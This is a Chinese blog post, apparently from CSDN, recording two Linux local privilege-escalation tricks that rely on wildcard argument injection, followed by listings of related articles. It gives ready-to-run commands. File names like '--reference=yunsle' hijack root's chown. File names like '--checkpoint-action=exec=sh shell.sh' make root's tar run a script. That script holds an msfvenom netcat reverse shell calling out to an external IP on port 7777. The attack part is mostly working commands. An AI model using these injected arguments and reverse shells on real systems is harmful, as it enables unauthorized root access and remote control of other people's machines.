linux 钓鱼,记录Linux下的钓鱼提权思路

最新推荐文章于 2022-11-12 23:02:16 发布
最新推荐文章于 2022-11-12 23:02:16 发布
阅读量145 收藏
点赞数
文章标签: linux 钓鱼

以两个例子的形式进行记录,作为备忘:

0x01 Chown的--reference特性

存在三个用户:root、yunsle和test,假设这样一个场景,root用户要将/home/test下所有的文件所有者设置为test,那么yunsle如何通过root的这样一个操作,达到攻击目的呢?

文件中目前内容如下:

6bd57f4b2ddf5472d55162be752fa749.png

snipaste20180802_114639.png

攻击者yunsle在/home/test下创建两个文件,如下:

echo "">yunsle

echo > --reference=yunsle

e336565717e2af3f809acb3ed30f0cd4.png

snipaste20180802_114719.png

此时root用户在当前目录下执行将所有文件拥有者设置为test的chown命令:

chown -R test:test *

9d65b1edbe7f24a4d9aae55181f48651.png

snipaste20180802_114751.png

虽然命令执行出现了报错,但是再查看文件,发现拥有者并没有修改为test,而是yunsle:

eb51e5227f43239f7d84209206b56ca8.png

snipaste20180802_114819.png

0x02 tar的命令执行:--checkpoint-action&--checkpoint

存在两个用户:root、yunsle,其中yunsle是非root组的攻击者,需要想办法提升权限,可以使用tar命令进行利用。

如果在cron计划中,root用户存在计划执行并且使用到了tar命令,或者攻击者提前知道root会对某个人文件执行tar,可以形成攻击场景。

攻击者首先自己可以生成一个反弹shell,如使用msfvenom:

msfvenom -p cmd/unix/reverse_netcat lhost=47.94.37.40 lport=7777 R

96aac8a233d1509fd23b214819ee8ebb.png

snipaste20180802_114846.png

并且在接收机上监听7777端口:

dcb3e56daee09636cb666696ce208fd7.png

snipaste20180802_114917.png

将反弹shell内容在目标机上,写入shell.sh文件:

32e1e46867c2bbbccf557d2ba5426b37.png

snipaste20180802_114931.png

接下来再创建两个文件:

echo > "--checkpoint-action=exec=sh shell.sh"

echo > --checkpoint=1

dfc39b55277d8b2e01c3b5a9524a4cfa.png

snipaste20180802_114953.png

此时,root对当前目录执行类似如下的tar操作:

tar -zcf bak.tgz /home/test/*

d67acf9a2170c2acb2caced42f7ff7d6.png

snipaste20180802_115017.png

已经成功以root身份执行shell.sh,并且将shell反弹至攻击者服务器:

4be2fe30a01c2729a4efffea6945fd69.png

snipaste20180802_115034.png

美界柯南
关注
网络攻防中利用各种漏洞和绕过Linux系统提权获取系统最高权限,多种方案详细和漏洞详细实现教程实战
代码讲故事
04-12 507
网络攻防中利用各种漏洞和绕过Linux系统提权获取系统最高权限,多种方案详细和漏洞详细实现教程实战。在渗透测试或者漏洞评估的过程中,提权是非常重要的一步,在这一步,黑客和安全研究人员常常通过exploit,bug,错误配置来提升权限。本文的例子都是在虚拟机里测试的,不同的虚拟机可以从Vulnhub下载。
Linux学习记录
everythingbeau的博客
07-21 2976
RPM(RedHatPackageManager),RedHat软件包管理工具,类似windows里面的setup.exe是Linux这系列操作系统里面的打包安装工具,它虽然是RedHat的标志,但理念是通用的。RPM包的名称格式-“apache”软件名称-“1.3.23-11”软件的版本号,主版本和此版本-“i386”是软件所运行的硬件平台,Intel32位处理器的统称-“rpm”文件扩展名,代表RPM包/bin/sh/bin/bashHOM。...
利用CVE-2021-3156进行远程提权
Zero_wenlong的博客
10-30 3257
利用CVE-2021-3156进行远程提权 一、漏洞简介 2021年1月26日,Linux安全工具sudo被发现严重的基于堆缓冲区溢出漏洞。利用这一漏洞,攻击者无需知道用户密码,一样可以获得root权限,并且是在默认配置下。此漏洞已分配为CVE-2021-3156,危险等级评分为7分. 当sudo通过-s或-i命令行选项在shell模式下运行命令时,它将在命令参数中使用反斜杠转义特殊字符。但使用-s或-i标志运行sudoedit时,实际上并未进行转义,从而可能导致缓冲区溢出。因此只要存在sudoers文件(
钓鱼的例子讲Linux五种网络IO模型
专注交流
08-10 533
如果对您有帮助,麻烦右边点个赞哦~~~     注:分布式的环境会与单机Linux五种网络IO模型的原理不一样。   网络I/O的本质是socket的读取,socket在linux系统被抽象为流,I/O可以理解为对流的操作。这个操作又分为两个阶段: 等待流数据准备(wating for the data to be ready)。 从内核向进程复制数据(copying the dat...
kali linux钓鱼教程,Kali linux建立钓鱼热点
weixin_30608641的博客
05-09 428
主要内容:参考网上多篇文章,自己动手完全实验成功,在这里详细记录自己在kalilinux下的搭建过程,本文着重于动手实现,不涉及原理,关于原理应该会在之后的单独文章中详细探究实验环境:Host 主机: Windows 8 64位虚拟机软件:VirtualBox 4.3.8(需要安装同4.3.8版本 拓展包 和 增强功能包 ,这是两个不同的包!安装增强包的时候需要安装相应的内核头文件和编译环境,这...
Msfvenom-命令-总结大全--
爱我非你莫属的博客
10-05 1682
Msfvenom命令 -p (–payload-options) 添加载荷payload。 载荷这个东西比较多,这个软件就是根据对应的载荷payload生成对应平台下的后门,所以只有选对payload,再填写正确自己的IP,PORT就可以生成对应语言,对应平台的后门了!!! (- -payload-options 列出payload选项) -l 查看所有payload encoder nops。 -f (–help-formats) 输出文件格式。 (- -hel
EDR项目在win server、linux、windows上安装进度表
12-21
EDR部署进度更新文件通常会记录每一步的完成情况,包括安装、配置、测试和优化阶段。这些更新可能包括: 1. 已安装的服务器和桌面数量。 2. 遇到的问题及解决方案。 3. 安全事件的数量和类型。 4. 性能监控数据,如...
chromium-linux.zip
10-06
总的来说,"chromium-linux.zip" 提供了一个深入了解和参与浏览器开发的机会,对于 Linux 开发者来说,这是一份宝贵的资源,可以学习到现代浏览器的工作原理,以及如何在 Linux 环境下进行高性能的软件开发。...
记录Linux下的钓鱼提权思路
weixin_33901926的博客
08-02 113
参考Freebuf上的提权文章(利用通配符进行Linux本地提权):http://www.freebuf.com/articles/system/176255.html 以两个例子的形式进行记录,作为备忘: 0x01 Chown的--reference特性 存在三个用户:root、yunsle和test,假设...
web安全渗透之钓鱼网站提权
kali_Ma的博客
11-12 4483
要生成一个钓鱼网址链接,诱导用户点击,实验过程是让win7去点击这个钓鱼网站链接,则会自动打开一个文件共享服务器的文件夹,在这个文件夹里面会有两个文件,当用户分别点击执行后,则会主动连接到发起攻击的主机上,即可攻击成功:攻击成功后,想要从kali上传文件到win7中,后发现权限不够的问题,则进行提权操作,后成功上传文件win7和kaliKali:它是Linux发行版的操作系统,它拥有超过300个渗透测试工具,就不用自己再去找安装包,去安装到我们自己的电脑上了,毕竟自己从网上找到,也不安全。
Kali-Linux下创建一个钓鱼WiFi热点
奋起的blog
02-26 2万+
http://www.myhack58.com/Article/sort097/2015/65019.htm 实验假设 通过伪造免费无线AP热点进行钓鱼的实验,分析、重放无线数据包窃取用户隐私,伪造钓鱼网站捕获用户账户密码,模拟黑客钓鱼攻击,评估无线热点安全隐患。 理论依据 手机开启WiFi功能后,会自动扫描附近的无线网络信号,当我们
Kali linux搭建钓鱼wifi
热门推荐
含笑
05-02 2万+
使用airbase-ng这款工具可以帮助我们建立Soft AP(伪AP),airbase-ng的使用参数如下:Options: -a bssid: set Access Point MAC address //设置AP的MAC地址 -i iface: capture packets from this interface //从指定接口抓取数据包(默认和数据包发送的口是同一个接口) -w
【漏洞挖掘】QQ钓鱼网站实战渗透
m0_46344990的博客
04-14 4843
渗透实战,通过报错注入拿到后台账号密码。
基于java+Face++人脸识别项目前端采用android实现.zip
09-14
1、资源项目源码均已通过严格测试验证,保证能够正常运行; 2、项目问题、技术讨论,可以给博主私信或留言,博主看到后会第一时间与您进行沟通; 3、本项目比较适合计算机领域相关的毕业设计课题、课程作业等使用,尤其对于人工智能、计算机科学与技术等相关专业,更为适合; 4、下载使用后,可先查看README.md文件(如有),本项目仅用作交流学习参考,请切勿用于商业用途。1、资源项目源码均已通过严格测试验证,保证能够正常运行; 2、项目问题、技术讨论,可以给博主私信或留言,博主看到后会第一时间与您进行沟通; 3、本项目比较适合计算机领域相关的毕业设计课题、课程作业等使用,尤其对于人工智能、计算机科学与技术等相关专业,更为适合; 4、下载使用后,可先查看README.md文件(如有),本项目仅用作交流学习参考,请切勿用于商业用途。1、资源项目源码均已通过严格测试验证,保证能够正常运行; 2、项目问题、技术讨论,可以给博主私信或留言,博主看到后会第一时间与您进行沟通; 3、本项目比较适合计算机领域相关的毕业设计课题、课程作业等使用,尤其对于人工智能、计算机科学与技术等相关专业,更为适合; 4、下载使
基于go-zero的云盘管理系统(CloudDisk).zip
最新发布
09-14
这是一个基于go-zero框架实现的云盘管理系统。它提供了用户管理、存储池管理以及文件分享等核心功能。系统支持密码登录、邮箱注册、用户详情、用户容量查询等用户模块功能。在存储池模块,系统支持中心存储池资源管理和个人存储池资源管理,包括文件上传、文件秒传、文件分片上传以及对接MinIO等功能。此外,系统还提供了文件分享模块,支持创建分享记录、获取资源详情和资源保存等操作。该项目轻量级、高效且易于扩展,是网盘系统的一个优秀实现。 1、资源项目源码均已通过严格测试验证,保证能够正常运行; 2、项目问题、技术讨论,可以给博主私信或留言,博主看到后会第一时间与您进行沟通; 3、本项目比较适合计算机领域相关的毕业设计课题、课程作业等使用,尤其对于人工智能、计算机科学与技术等相关专业,更为适合; 4、下载使用后,可先查看reADME.md文件(如有),本项目仅用作交流学习参考,请切勿用于商业用途。
C#中的Lambda表达式:简化委托与表达式树
09-14
在C#编程语言中,Lambda表达式提供了一种简洁的方式来表示匿名函数,即没有具体名称的函数。Lambda表达式在C# 3.0中引入,作为.NET Framework的一部分,它们在LINQ(Language Integrated Query)查询中尤其有用,但也可以用于任何需要委托类型的地方。 Lambda表达式是C#中一个非常强大和灵活的特性,它允许以简洁的方式编写匿名函数。Lambda表达式可以用于委托、表达式树、LINQ查询等多种场景。通过使用Lambda表达式,开发者可以编写更加简洁、可读和可维护的代码。理解Lambda表达式的工作原理和使用场景对于编写高效的C#程序至关重要。 在C#编程语言中,Lambda表达式提供了一种简洁的方式来表示匿名函数,即没有具体名称的函数。Lambda表达式在C# 3.0中引入,作为.NET Framework的一部分,它们在LINQ(Language Integrated Query)查询中尤其有用,但也可以用于任何需要委托类型的地方。 Lambda表达式是C#中一个非常强大和灵活的特性,它允许以简洁的方式编写匿名函数。Lambda表达式可以
基于ssm的旅游管理系统设计与实现.docx
09-14
基于ssm的旅游管理系统设计与实现.docx
Linux环境下反垃圾邮件管理系统设计与实现
文章强调了Linux环境下反垃圾邮件管理系统的必要性,并描述了系统架构及其主要模块,包括前台界面、邮件接收、邮件解析、内容分析和钓鱼邮件检测。" 在Linux环境下,反垃圾邮件管理系统是一个至关重要的工具,它...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值